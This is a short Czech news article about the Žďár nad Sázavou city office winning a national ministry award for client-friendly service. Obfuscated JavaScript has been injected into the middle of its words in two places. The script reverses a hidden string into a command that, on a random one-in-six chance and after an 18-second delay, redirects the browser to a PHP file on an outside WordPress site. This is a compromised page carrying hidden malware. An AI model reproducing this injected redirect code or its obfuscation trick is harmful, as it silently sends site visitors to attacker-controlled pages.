Rainbow page separator

Žďár má nejpřívětivější úřad v kraji a druhý nejlepší v ČR

Sobota, 20. listopadu 2021

Žďár nad Sázavou / Už pošesté převzali zástupci žďárského městského úřadu ocenění ministerstva vnitra Přívětivý úřad. Le["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos se v hodnocení mezi celkem 132 městy s rozšířenou působností třetího stupně umístil jako první v Kraji Vysočina a druhý v rámci celé České republiky. Prvním v republice stal Kolín, třetím pak Ostrava. Soutěž se odvíjí od komplexního přístupu úřadů v oblasti kvality při posky["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tování služeb klientům. Více než sedmdesát kritérií hodnotí přístupnost a otevřenost úřadu, komunikaci s klienty, digitalizaci služeb, zapojování veřejnosti, kroky ke zvýšení udržitelnosti a nyní i opatření přijatá během pandemie COVID-19. K soutěži vyšla rovněž tradiční sbírka příkladů dobré praxe, která má sloužit jako inspirace. Vítězná města se ve sbírkách objevují opakovaně, konkrétně Žďár je v posledních letech příkladným městem pro rozvoj udržitelného přístupu úřadu a zavádění energetického managementu.